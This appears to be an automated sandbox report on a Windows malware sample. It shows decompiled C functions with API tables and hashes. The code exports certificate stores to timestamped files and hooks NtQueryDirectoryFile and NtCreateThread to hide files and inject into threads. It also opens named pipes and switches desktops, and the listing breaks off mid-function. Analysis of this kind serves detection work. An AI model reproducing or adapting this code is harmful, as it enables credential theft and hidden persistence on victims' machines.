				_t19 =  *0x416d1c(_t46, _t37,  *((intOrPtr*)(_t48 + 0x7c)), _t42, _t45, _t36);
				 *((intOrPtr*)(_t48 + 0x7c)) = _t19;
				if(_t19 != 0 && _t46 != 0 &&  *_t46 != 0 &&  *((intOrPtr*)(_t46 + 4)) != 0) {
					GetSystemTime(_t48 + 0x5c);
					_t25 =  *0x416c34; // 0x25df5a8
					_t11 = _t25 + 0x178; // 0x25643a8
					wnsprintfW(_t48 - 0x6c, 0x63,  *_t11, L"grb",  *(_t48 + 0x62) & 0x0000ffff,  *(_t48 + 0x5e) & 0x0000ffff,  *(_t48 + 0x5c) & 0x0000ffff);
					if(E00415305(_t39, _t41, 3, 0, _t48 - 0x6c,  *((intOrPtr*)(_t46 + 4)),  *_t46) == 0) {
						L7:
						 *((intOrPtr*)(_t48 + 0x7c)) = 0;
					} else {
						if(_t37 != 0) {
							lstrcatW(_t48 - 0x6c, L".txt");
							if(E00415305(_t37, _t41, 3, 0, _t48 - 0x6c, _t37, E0040F533(_t37) + _t32) == 0) {
								goto L7;
							}
						}
					}
				}
				return  *((intOrPtr*)(_t48 + 0x7c));
			}














    0x0040486e
    0x0040486e
    0x0040486f
    0x0040487a
    0x0040487e
    0x00404887
    0x0040488f
    0x00404894
    0x004048b3
    0x004048c8
    0x004048d2
    0x004048de
    0x004048fa
    0x0040492a
    0x0040492a
    0x004048fc
    0x004048fe
    0x00404909
    0x00404928
    0x00000000
    0x00000000
    0x00404928
    0x004048fe
    0x004048fa
    0x00404937

    APIs
    • PFXImportCertStore.CRYPT32(?,?,?), ref: 00404887
    • GetSystemTime.KERNEL32(?), ref: 004048B3
    • wnsprintfW.SHLWAPI ref: 004048DE
    • lstrcatW.KERNEL32(?,.txt), ref: 00404909
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CertImportStoreSystemTimelstrcatwnsprintf
    • String ID: .txt$grb
    • API String ID: 1380901484-2795990106
    • Opcode ID: e23c33f906e7cf3e20f18cadb6924f4198b2c7d4141211660669a46235e87e01
    • Instruction ID: 29a073afa3b7aa8db112aecf2a51147a39ca4b5dab3ecab49a569e557fbd1a41
    • Opcode Fuzzy Hash: e23c33f906e7cf3e20f18cadb6924f4198b2c7d4141211660669a46235e87e01
    • Instruction Fuzzy Hash: 6B2150B2500608ABDB309FA9DD44EEFB7ECEB88705F108537FA64E3591D2799944CB24
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040B231, Relevance: 10.6, APIs: 7, Instructions: 73synchronizationpipeCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E0040B231(void* __ecx, void* __eflags, void* _a4, intOrPtr _a8) {
				short _v524;
				void* __edi;
				void* _t16;
				void* _t20;
				void* _t34;
				void** _t37;

				_t34 = __ecx;
				E0040B088( &_v524, _a8);
				_t16 = 0x14;
				_t37 = E0040F0A8(_t16);
				if(_t37 != 0) {
					_t20 = CreateNamedPipeW( &_v524, 3, 6, 0xff, 0x200, 0x200, 0, 0);
					 *_t37 = _t20;
					if(_t20 != 0xffffffff) {
						_t37[1] = CreateEventW(0, 0, 0, 0);
						_t37[2] = CreateEventW(0, 0, 0, 0);
						_t37[3] = _a4;
						_t37[4] = E0040F21C(_a8);
						if(E0040C14A(_t34, E0040B0A9, _t37) != 0) {
							WaitForSingleObject(_t37[2], 0xffffffff);
							return _t37;
						}
						CloseHandle( *_t37);
						CloseHandle(_t37[1]);
						CloseHandle(_t37[2]);
						E0040F0C0(_t37[4]);
					}
					E0040F0C0(_t37);
				}
				return 0;
			}









    0x0040b231
    0x0040b245
    0x0040b24c
    0x0040b252
    0x0040b258
    0x0040b27a
    0x0040b280
    0x0040b285
    0x0040b29d
    0x0040b2a9
    0x0040b2af
    0x0040b2bd
    0x0040b2c7
    0x0040b2f2
    0x00000000
    0x0040b2f8
    0x0040b2cb
    0x0040b2d4
    0x0040b2dd
    0x0040b2e6
    0x0040b2e6
    0x0040b288
    0x0040b288
    0x00000000

    APIs
      • Part of subcall function 0040B088: lstrcpyW.KERNEL32(?,\\.\pipe\), ref: 0040B091
      • Part of subcall function 0040B088: lstrcpyW.KERNEL32(?,?), ref: 0040B09F
    • CreateNamedPipeW.KERNEL32(?,00000003,00000006,000000FF,00000200,00000200,00000000,00000000,?,?,00000001), ref: 0040B27A
    • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,00000001), ref: 0040B293
    • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,00000001), ref: 0040B2A0
      • Part of subcall function 0040C14A: CreateThread.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 0040C160
      • Part of subcall function 0040C14A: CloseHandle.KERNEL32(00000000,?,?,00409EEF,00409DB4,00000000), ref: 0040C167
    • CloseHandle.KERNEL32(00000000,0040B0A9,00000000,?,00000001), ref: 0040B2CB
    • CloseHandle.KERNEL32(?,?,00000001), ref: 0040B2D4
    • CloseHandle.KERNEL32(?,?,00000001), ref: 0040B2DD
      • Part of subcall function 0040F0C0: HeapFree.KERNEL32(00000000,00000000,0040B690,00000000,00000001), ref: 0040F0D3
    • WaitForSingleObject.KERNEL32(?,000000FF,0040B0A9,00000000,?,00000001), ref: 0040B2F2
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CloseCreateHandle$Eventlstrcpy$FreeHeapNamedObjectPipeSingleThreadWait
    • String ID:
    • API String ID: 306608339-0
    • Opcode ID: f23d121d14f02fa3209879632265a8dbf9b660d725feb563adbc882fbfe908f0
    • Instruction ID: 6fe8837a8baf8c72bd574b51e69667a0997d70e1d20b33aa98009220c85d07c8
    • Opcode Fuzzy Hash: f23d121d14f02fa3209879632265a8dbf9b660d725feb563adbc882fbfe908f0
    • Instruction Fuzzy Hash: 8D219D31500301ABC7306F32DC0DD9B7AB8EF95710B118A3EB5A6E25E1DB389841DBA8
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00415582, Relevance: 9.1, APIs: 6, Instructions: 92filesynchronizationCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E00415582() {
				char _v5;
				struct _WIN32_FIND_DATAW _v604;
				short _v1124;
				void* __esi;
				void* _t23;
				void* _t25;
				intOrPtr _t28;
				void* _t29;
				intOrPtr _t30;
				intOrPtr _t32;
				int _t35;
				void* _t44;

				_v5 = 0;
				E00415561( &_v1124);
				_t23 = FindFirstFileW( &_v1124,  &_v604);
				if(_t23 == 0xffffffff) {
					L5:
					_t25 = FindFirstFileW(0x417478,  &_v604);
					__eflags = _t25 - 0xffffffff;
					if(_t25 == 0xffffffff) {
						L16:
						return _v5;
					}
					FindClose(_t25);
					__eflags = _v604.nFileSizeLow;
					if(_v604.nFileSizeLow > 0) {
						L8:
						_t28 =  *0x416c34; // 0x25df5a8
						_t11 = _t28 + 0x20; // 0x25df890
						_t29 = CreateMutexW(0x417680, 0,  *_t11);
						__eflags = _t29;
						if(_t29 == 0) {
							_t44 = 0;
							__eflags = 0;
						} else {
							_t44 = E004115FE(_t29);
						}
						_t30 =  *0x416c34; // 0x25df5a8
						_t12 = _t30 + 0x2c; // 0x25df908
						E0040B37A(__eflags,  *_t12, 8, 0, 0, 0, 0);
						__eflags = _v604.nFileSizeHigh;
						if(_v604.nFileSizeHigh <= 0) {
							__eflags = _v604.nFileSizeLow;
							if(__eflags > 0) {
								_t35 = MoveFileExW(0x417478,  &_v1124, 3);
								__eflags = _t35;
								_t16 =  &_v5;
								 *_t16 = _t35 != 0;
								__eflags =  *_t16;
							}
						} else {
							E0040FFBF(0x417478);
						}
						_t32 =  *0x416c34; // 0x25df5a8
						_t17 = _t32 + 0x2c; // 0x25df908
						E0040B37A(__eflags,  *_t17, 7, 0, 0, 0, 0);
						E0041161F(_t44);
						goto L16;
					}
					__eflags = _v604.nFileSizeHigh;
					if(_v604.nFileSizeHigh <= 0) {
						goto L16;
					}
					goto L8;
				}
				FindClose(_t23);
				if(_v604.nFileSizeLow <= 0 || _v604.nFileSizeHigh != 0) {
					E0040FFBF( &_v1124);
					goto L5;
				} else {
					return 1;
				}
			}















    0x00415597
    0x0041559a
    0x004155ad
    0x004155b6
    0x004155e2
    0x004155ef
    0x004155f5
    0x004155f8
    0x00415694
    0x00000000
    0x00415694
    0x004155ff
    0x00415605
    0x0041560b
    0x00415615
    0x00415615
    0x0041561a
    0x00415623
    0x00415629
    0x0041562b
    0x00415638
    0x00415638
    0x0041562d
    0x00415634
    0x00415634
    0x0041563a
    0x00415645
    0x00415648
    0x0041564d
    0x00415653
    0x0041565d
    0x00415663
    0x0041566f
    0x00415675
    0x00415677
    0x00415677
    0x00415677
    0x00415677
    0x00415655
    0x00415656
    0x00415656
    0x0041567b
    0x00415686
    0x00415689
    0x0041568f
    0x00000000
    0x0041568f
    0x0041560d
    0x00415613
    0x00000000
    0x00000000
    0x00000000
    0x00415613
    0x004155b9
    0x004155c5
    0x004155dd
    0x00000000
    0x004155cf
    0x00000000
    0x004155cf

    APIs
      • Part of subcall function 00415561: lstrcpyW.KERNEL32(004158C0,00417478), ref: 0041556A
      • Part of subcall function 00415561: lstrcatW.KERNEL32(?,.lll), ref: 00415579
    • FindFirstFileW.KERNEL32(?,?,?,?,?,?), ref: 004155AD
    • FindClose.KERNEL32(00000000,?,?,?), ref: 004155B9
    • FindFirstFileW.KERNEL32(00417478,?,?,?,?), ref: 004155EF
    • FindClose.KERNEL32(00000000,?,?,?), ref: 004155FF
    • CreateMutexW.KERNEL32(00417680,00000000,025DF890,?,?,?), ref: 00415623
    • MoveFileExW.KERNEL32(00417478,?,00000003,025DF908,00000008,00000000,00000000,00000000,00000000,?,?,?), ref: 0041566F
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Find$File$CloseFirst$CreateMoveMutexlstrcatlstrcpy
    • String ID:
    • API String ID: 1879962031-0
    • Opcode ID: ad996db81e10b1df0ec1e58bf669fd31810340a2eaa5de82ab55f143d9384247
    • Instruction ID: e557b12710132166f3590febf44e1a0fedd1765762edf04073cf77be4a1c1cc3
    • Opcode Fuzzy Hash: ad996db81e10b1df0ec1e58bf669fd31810340a2eaa5de82ab55f143d9384247
    • Instruction Fuzzy Hash: 30319371800518EFCB20AB649DC4EEE777DEB45359F5141BBF208A2160D7388E858F6D
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00411D26, Relevance: 9.1, APIs: 6, Instructions: 79fileCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E00411D26(void* __ecx, intOrPtr* __edx, WCHAR* _a4, WCHAR* _a8, signed int _a12) {
				short _v540;
				char _v548;
				short _v1044;
				short _v1052;
				char _v1068;
				struct _WIN32_FIND_DATAW _v1644;
				signed char _v1660;
				void* __edi;
				int _t25;
				void* _t46;
				void* _t52;
				intOrPtr* _t55;

				_t55 = __edx;
				_t52 = __ecx;
				_t25 = PathCombineW( &_v1044, _a4, "*");
				if(_t25 == 0) {
					L12:
					return _t25;
				}
				_t25 = FindFirstFileW( &_v1052,  &_v1644);
				_t46 = _t25;
				if(_t46 == 0xffffffff) {
					goto L12;
				} else {
					goto L2;
				}
				do {
					L2:
					if(E0040FFDD( &(_v1644.cFileName)) == 0 && PathCombineW( &_v1052, _a4,  &(_v1644.cFileName)) != 0 && PathCombineW( &_v540, _a8,  &(_v1644.dwReserved0)) != 0) {
						if((_v1660 & 0x00000010) == 0) {
							if(E00411C49(_t52,  &_v1068,  &_v548) != 0) {
								 *_t55 =  *_t55 + 1;
							}
						} else {
							if((_a12 & 0x00000001) != 0) {
								E00411D26(_t52, _t55,  &_v1068,  &_v548, _a12);
							}
						}
					}
				} while (FindNextFileW(_t46,  &_v1644) != 0);
				_t25 = FindClose(_t46);
				goto L12;
			}















    0x00411d45
    0x00411d47
    0x00411d49
    0x00411d51
    0x00411e17
    0x00411e1d
    0x00411e1d
    0x00411d64
    0x00411d6a
    0x00411d6f
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00411d75
    0x00411d75
    0x00411d80
    0x00411dbb
    0x00411df8
    0x00411dfa
    0x00411dfa
    0x00411dbd
    0x00411dc1
    0x00411dda
    0x00411dda
    0x00411dc1
    0x00411dbb
    0x00411e08
    0x00411e11
    0x00000000

    APIs
    • PathCombineW.SHLWAPI(?,00405611,00401058,00000000,00000000,00000000), ref: 00411D49
    • FindFirstFileW.KERNEL32(?,?), ref: 00411D64
    • PathCombineW.SHLWAPI(?,00405611,?), ref: 00411D92
    • PathCombineW.SHLWAPI(?,?,?), ref: 00411DAC
    • FindNextFileW.KERNEL32(00000000,?), ref: 00411E02
    • FindClose.KERNEL32(00000000), ref: 00411E11
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CombineFindPath$File$CloseFirstNext
    • String ID:
    • API String ID: 3830188700-0
    • Opcode ID: 23f2b425feb4d18e97780faac2eed7a0d396ff4b1a5951ad9db3b1a51bc65043
    • Instruction ID: a4fd040686ebf23308ed824e65d3e39c574d42efa37f519916c93dec6cce8b94
    • Opcode Fuzzy Hash: 23f2b425feb4d18e97780faac2eed7a0d396ff4b1a5951ad9db3b1a51bc65043
    • Instruction Fuzzy Hash: 0321607120834AABCB20DB60EC48EEB77EDAB45318F00492BBA95C2160EB79D559C759
    Uniqueness

    Uniqueness Score: -1.00%

    Function 004076BC, Relevance: 9.1, APIs: 6, Instructions: 67threadnativeprocessCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E004076BC(CONTEXT* __ebx, void* __edi, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, void* _a20, struct _EXCEPTION_RECORD _a24, struct _PROCESS_PARAMETERS _a28, char _a32) {
				long _v8;
				intOrPtr _v16;
				intOrPtr _v28;
				void _v32;
				intOrPtr _v48;
				void* _v60;
				void* _t29;
				int _t33;
				CONTEXT* _t37;
				void* _t40;

				_t37 = __ebx;
				if(NtQueryInformationProcess(_a20, 0,  &_v32, 0x18,  &_v8) != 0 || _v28 == 0) {
					L13:
					return NtCreateThread(_a8, _a12, _a16, _a20, _a24, _t37, _a28, _a32);
				} else {
					_v8 = 0;
					if(_v16 == 0) {
						L11:
						_t29 = E004070D3(_a20);
						if(_t29 != 0) {
							 *((intOrPtr*)(_t37 + 0xb0)) = _t29 + _a4;
						}
						goto L13;
					}
					_t40 = CreateToolhelp32Snapshot(4, 0);
					if(_t40 == 0) {
						L10:
						if(_v8 != 0) {
							goto L13;
						}
						goto L11;
					}
					_v60 = 0x1c;
					_t33 = Thread32First(_t40,  &_v60);
					while(_t33 != 0) {
						if(_v48 == _v16) {
							_v8 = _v8 + 1;
						}
						_t33 = Thread32Next(_t40,  &_v60);
					}
					CloseHandle(_t40);
					goto L10;
				}
			}













    0x004076bc
    0x004076db
    0x0040774c
    0x0040776a
    0x004076e2
    0x004076e2
    0x004076e8
    0x00407735
    0x00407738
    0x0040773f
    0x00407746
    0x00407746
    0x00000000
    0x0040773f
    0x004076f4
    0x004076f8
    0x0040772f
    0x00407733
    0x00000000
    0x00000000
    0x00000000
    0x00407733
    0x004076ff
    0x00407706
    0x00407724
    0x00407714
    0x00407716
    0x00407716
    0x0040771e
    0x0040771e
    0x00407729
    0x00000000
    0x00407729

    APIs
    • NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,?), ref: 004076D3
    • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 004076EE
    • Thread32First.KERNEL32(00000000,?), ref: 00407706
    • Thread32Next.KERNEL32(00000000,0000001C), ref: 0040771E
    • CloseHandle.KERNEL32(00000000), ref: 00407729
    • NtCreateThread.NTDLL(?,?,?,?,?,?,?,?), ref: 00407762
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CreateThread32$CloseFirstHandleInformationNextProcessQuerySnapshotThreadToolhelp32
    • String ID:
    • API String ID: 1144773994-0
    • Opcode ID: e9aa468f78780362bb11592afe0da96d354cdb422d82eb448901ac4eb4f1d333
    • Instruction ID: 3753e930f9030660ce60b00ff12ece1227bf3df83c378ee524f8039dd191db27
    • Opcode Fuzzy Hash: e9aa468f78780362bb11592afe0da96d354cdb422d82eb448901ac4eb4f1d333
    • Instruction Fuzzy Hash: 27210832905119EFDF129F90DC44DEFBB79EB44784F118036F905A2190D734E952DBAA
    Uniqueness

    Uniqueness Score: -1.00%

    Function 004079FA, Relevance: 9.1, APIs: 6, Instructions: 59fileCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E004079FA(void* __ecx, void* __edx, void* __eflags, signed int _a8) {
				short _v524;
				char _v532;
				short _v1072;
				struct _WIN32_FIND_DATAW _v1120;
				short _v1636;
				short _v1640;
				void* _t23;
				int _t27;
				void* _t35;
				void* _t36;
				WCHAR* _t38;
				void* _t39;

				_t36 = __edx;
				_t35 = __ecx;
				_t14 = _a8;
				_t38 = E0040F4DC(_a8 | 0xffffffff,  *_t14);
				if(_t38 != 0) {
					ExpandEnvironmentStringsW(_t38,  &_v1636, 0x103);
					E0040F0C0(_t38);
					_t39 = FindFirstFileW( &_v1640,  &_v1120);
					__eflags = _t39;
					if(_t39 != 0) {
						PathRemoveFileSpecW( &_v1636);
						do {
							__eflags = _v1120.ftCreationTime.dwFileAttributes & 0x00000010;
							if(__eflags == 0) {
								PathCombineW( &_v524,  &_v1636,  &_v1072);
								E0041547E(_t35, _t36, __eflags,  &_v532, 0,  &_v532);
							}
							_t27 = FindNextFileW(_t39,  &(_v1120.ftCreationTime));
							__eflags = _t27;
						} while (_t27 != 0);
						FindClose(_t39);
					}
					_t23 = 1;
				} else {
					_t23 = 0;
				}
				return _t23;
			}















    0x004079fa
    0x004079fa
    0x00407a00
    0x00407a14
    0x00407a18
    0x00407a2c
    0x00407a33
    0x00407a4b
    0x00407a4d
    0x00407a4f
    0x00407a56
    0x00407a5c
    0x00407a5c
    0x00407a64
    0x00407a7b
    0x00407a8c
    0x00407a8c
    0x00407a9a
    0x00407aa0
    0x00407aa0
    0x00407aa5
    0x00407aa5
    0x00407aab
    0x00407a1a
    0x00407a1a
    0x00407a1a
    0x00407ab1

    APIs
      • Part of subcall function 0040F4DC: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,?,00000000,0040B681,00000001), ref: 0040F50D
    • ExpandEnvironmentStringsW.KERNEL32(00000000,00000103,00000103,?), ref: 00407A2C
    • FindFirstFileW.KERNEL32(?,?,00000000), ref: 00407A45
    • PathRemoveFileSpecW.SHLWAPI(?), ref: 00407A56
    • PathCombineW.SHLWAPI(?,?,?), ref: 00407A7B
    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00407A9A
    • FindClose.KERNEL32(00000000), ref: 00407AA5
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: FileFind$Path$ByteCharCloseCombineEnvironmentExpandFirstMultiNextRemoveSpecStringsWide
    • String ID:
    • API String ID: 3264331536-0
    • Opcode ID: 10a113e8d4bf22edbfcd64d253be27d9aa2e10fc38427998e2c366ddc3a5bb9a
    • Instruction ID: 553e09da5053cc09fdc0209efac00036261da7612b3bed5ded28cf039da4d823
    • Opcode Fuzzy Hash: 10a113e8d4bf22edbfcd64d253be27d9aa2e10fc38427998e2c366ddc3a5bb9a
    • Instruction Fuzzy Hash: 2E1186725086186BC331DB60DC48EDF77ECAF45310F008A3AF954D2190D738D6058BAA
    Uniqueness

    Uniqueness Score: -1.00%

    Function 004100F6, Relevance: 9.1, APIs: 6, Instructions: 53encryptionCOMMON
    Download Yara Rule
    APIs
    • CryptAcquireContextW.ADVAPI32(0041420C,00000000,00000000,00000001,F0000040,?,0041420C,00000000,?,-0000001C,00000000,?,?,?), ref: 0041010F
    • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 00410127
    • CryptHashData.ADVAPI32(?,00000010), ref: 00410142
    • CryptGetHashParam.ADVAPI32(?,00000002,?,00000010,00000000), ref: 00410159
    • CryptDestroyHash.ADVAPI32(?), ref: 00410170
    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0041017A
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamRelease
    • String ID:
    • API String ID: 3186506766-0
    • Opcode ID: 9e3d9cc19cc56eed7fd62d552180aacc983cdfcc723d2db39dc424aaec30bfe4
    • Instruction ID: 55f3b8ffd3746c5a0a9ec5e145f7040ea233fd5557318470747f5ca4dd69f733
    • Opcode Fuzzy Hash: 9e3d9cc19cc56eed7fd62d552180aacc983cdfcc723d2db39dc424aaec30bfe4
    • Instruction Fuzzy Hash: 1B11E87190020CBFEF115FA4CC44FEF7B7CEB04784F008465B551A12A1EBBA8D949B68
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040BFE7, Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E0040BFE7() {
				intOrPtr _t3;
				intOrPtr _t8;
				long _t12;
				struct HWINSTA__* _t13;
				struct HDESK__* _t15;

				_t3 =  *0x416c34; // 0x25df5a8
				_t12 = 0;
				_t1 = _t3 + 0x78; // 0x25dfaf9
				_t13 = OpenWindowStationA( *_t1, 0, 0x10000000);
				if(_t13 != 0) {
					if(SetProcessWindowStation(_t13) != 0) {
						_t8 =  *0x416c34; // 0x25df5a8
						_t2 = _t8 + 0x7c; // 0x25dfc59
						_t15 = OpenDesktopA( *_t2, 0, 0, 0x10000000);
						if(_t15 != 0) {
							SetThreadDesktop(_t15);
							_t12 = 1;
							CloseDesktop(_t15);
						}
					}
					CloseWindowStation(_t13);
				}
				return _t12;
			}








    0x0040bfe7
    0x0040bff5
    0x0040bff8
    0x0040c001
    0x0040c005
    0x0040c010
    0x0040c012
    0x0040c01a
    0x0040c023
    0x0040c027
    0x0040c02a
    0x0040c031
    0x0040c033
    0x0040c033
    0x0040c027
    0x0040c03a
    0x0040c03a
    0x0040c045

    APIs
    • OpenWindowStationA.USER32(025DFAF9,00000000,10000000), ref: 0040BFFB
    • SetProcessWindowStation.USER32(00000000), ref: 0040C008
    • OpenDesktopA.USER32(025DFC59,00000000,00000000,10000000), ref: 0040C01D
    • SetThreadDesktop.USER32(00000000), ref: 0040C02A
    • CloseDesktop.USER32(00000000), ref: 0040C033
    • CloseWindowStation.USER32(00000000), ref: 0040C03A
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: DesktopStationWindow$CloseOpen$ProcessThread
    • String ID:
    • API String ID: 2658375134-0
    • Opcode ID: 4bcf8cbb21c16f678587ba5fc99d68d5f903d6dff48441f62968e74d89113649
    • Instruction ID: 9a32b9f1a6c9afef737543acc3624aad95a547df286c964ebdcfe3cf58ddb98f
    • Opcode Fuzzy Hash: 4bcf8cbb21c16f678587ba5fc99d68d5f903d6dff48441f62968e74d89113649
    • Instruction Fuzzy Hash: EEF03076102034EFD7202FA9ACC8EEB3AACEB493A53068036F105D3231C625AC01C7A8
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00405C8F, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 130nativefilestringCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E00405C8F(signed int _a4, void* _a8, _Unknown_base(*)()* _a12, void* _a16, struct _ERESOURCE_LITE _a20, void* _a24, long _a28, union _FILE_INFORMATION_CLASS _a32, long _a36, struct _EXCEPTION_RECORD _a40, char _a44) {
				char _v524;
				WCHAR* _v1544;
				void _v1548;
				void* __edi;
				void* __esi;
				long _t45;
				signed int _t51;
				void* _t53;
				signed int _t59;
				signed int _t60;
				void* _t61;
				void* _t62;
				union _FILE_INFORMATION_CLASS _t68;
				void* _t69;
				intOrPtr _t71;
				char* _t74;
				signed int* _t76;
				void* _t78;
				WCHAR* _t79;
				signed int* _t80;

				_t68 = _a32;
				_t45 = NtQueryDirectoryFile(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _t68, _a36, _a40, _a44);
				_a40 = _t45;
				if(_t45 != 0 || _a24 == _t45 || _t68 != 1 && _t68 != 2 && _t68 != 3 && _t68 != 0xc) {
					L31:
					return _a40;
				} else {
					_a36 = _a36 & 0x00000000;
					if(NtQueryObject(_a4, 1,  &_v1548, 0x400,  &_a36) != 0) {
						goto L31;
					}
					_t79 =  *0x416778; // 0x0
					_v1544[_v1548 & 0x0000ffff] = 0;
					_t89 = _t79;
					if(_t79 != 0) {
						L11:
						_t51 = lstrcmpiW(_t79, _v1544);
						if(_t51 != 0) {
							goto L31;
						}
						_a44 = _a44 & _t51;
						_a4 = _a4 & _t51;
						_t53 = _t68 - 1;
						if(_t53 == 0) {
							_a44 = 0x40;
							L20:
							_a4 = 0x3c;
							L21:
							_t69 = 0;
							_t80 = 0;
							do {
								_t76 = _t80;
								_t80 = _t69 + _a24;
								if(E00405C44(_t80 + _a44,  *((intOrPtr*)(_t80 + _a4))) == 0) {
									goto L26;
								}
								_t60 =  *_t80;
								if(_t60 == 0) {
									__eflags = _t76;
									if(_t76 == 0) {
										_a40 = 0xc000000f;
									} else {
										 *_t76 =  *_t76 & 0x00000000;
									}
									goto L31;
								}
								if(_t76 != 0) {
									 *_t76 =  *_t76 + _t60;
								}
								L26:
								_t59 =  *_t80;
								_t69 = _t69 + _t59;
							} while (_t59 > 0);
							goto L31;
						}
						_t61 = _t53 - 1;
						if(_t61 == 0) {
							_a44 = 0x44;
							goto L20;
						}
						_t62 = _t61 - 1;
						if(_t62 == 0) {
							_a44 = 0x5e;
							goto L20;
						} else {
							if(_t62 == 9) {
								_a44 = 0xc;
								_a4 = 8;
							}
							goto L21;
						}
					} else {
						E0040B798( &_v524, _t89);
						_t79 = E0040F21C( &_v524);
						 *0x416778 = _t79;
						_t74 = 0x4161dd;
						_t78 = 2;
						do {
							_t24 = _t74 - 1; // 0x30000
							_t71 =  *0x416c34; // 0x25df5a8
							 *_t74 = E0040F533( *((intOrPtr*)(_t71 + ( *_t24 & 0x000000ff) * 4)));
							_t74 = _t74 + 2;
							_t78 = _t78 - 1;
						} while (_t78 != 0);
						if(_t79 == 0) {
							goto L31;
						}
						goto L11;
					}
				}
			}























    0x00405c99
    0x00405cbd
    0x00405cc3
    0x00405cc8
    0x00405e18
    0x00405e1f
    0x00405cef
    0x00405cef
    0x00405d10
    0x00000000
    0x00000000
    0x00405d1d
    0x00405d2b
    0x00405d2f
    0x00405d31
    0x00405d76
    0x00405d7d
    0x00405d85
    0x00000000
    0x00000000
    0x00405d8b
    0x00405d8e
    0x00405d93
    0x00405d94
    0x00405dc3
    0x00405dca
    0x00405dca
    0x00405dd1
    0x00405dd1
    0x00405dd3
    0x00405dd5
    0x00405dd8
    0x00405dda
    0x00405df0
    0x00000000
    0x00000000
    0x00405df2
    0x00405df6
    0x00405e08
    0x00405e0a
    0x00405e11
    0x00405e0c
    0x00405e0c
    0x00405e0c
    0x00000000
    0x00405e0a
    0x00405dfa
    0x00405dfc
    0x00405dfc
    0x00405dfe
    0x00405dfe
    0x00405e00
    0x00405e02
    0x00000000
    0x00405e06
    0x00405d96
    0x00405d97
    0x00405dba
    0x00000000
    0x00405dba
    0x00405d99
    0x00405d9a
    0x00405db1
    0x00000000
    0x00405d9c
    0x00405d9f
    0x00405da1
    0x00405da8
    0x00405da8
    0x00000000
    0x00405d9f
    0x00405d33
    0x00405d39
    0x00405d45
    0x00405d49
    0x00405d4f
    0x00405d54
    0x00405d55
    0x00405d55
    0x00405d59
    0x00405d67
    0x00405d6a
    0x00405d6b
    0x00405d6b
    0x00405d70
    0x00000000
    0x00000000
    0x00000000
    0x00405d70
    0x00405d31

    APIs
    • NtQueryDirectoryFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 00405CBD
    • NtQueryObject.NTDLL(?,00000001,?,00000400,00000000), ref: 00405D08
    • lstrcmpiW.KERNEL32(00000000,?), ref: 00405D7D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Query$DirectoryFileObjectlstrcmpi
    • String ID: <$@
    • API String ID: 2113822959-1426351568
    • Opcode ID: c264a2b67adbd621dae690cdd7a4022101d423fa10c5deaf647d3dc51d0669e7
    • Instruction ID: b6fca0cbe9de38c8d840e2086eb3b0fd72afde187fa94daac946d15b6c8786cf
    • Opcode Fuzzy Hash: c264a2b67adbd621dae690cdd7a4022101d423fa10c5deaf647d3dc51d0669e7
    • Instruction Fuzzy Hash: 6E41CD32510A09ABDF218F58C888AEB7BA5FF48354F15813BFD44A7290D739C991CF98
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00414BBB, Relevance: 6.2, APIs: 4, Instructions: 195COMMON
    Download Yara Rule
    C-Code - Quality: 75%
    			E00414BBB(signed int* __esi, signed int _a4) {
				signed int _v12;
				char _v13;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				short _v72;
				signed short _v74;
				signed short _v76;
				signed short _v78;
				signed short _v80;
				signed char _v86;
				signed int _v88;
				signed short _v90;
				signed short _v92;
				char _v288;
				struct _OSVERSIONINFOW _v368;
				short _v600;
				void* __ebx;
				void* __edi;
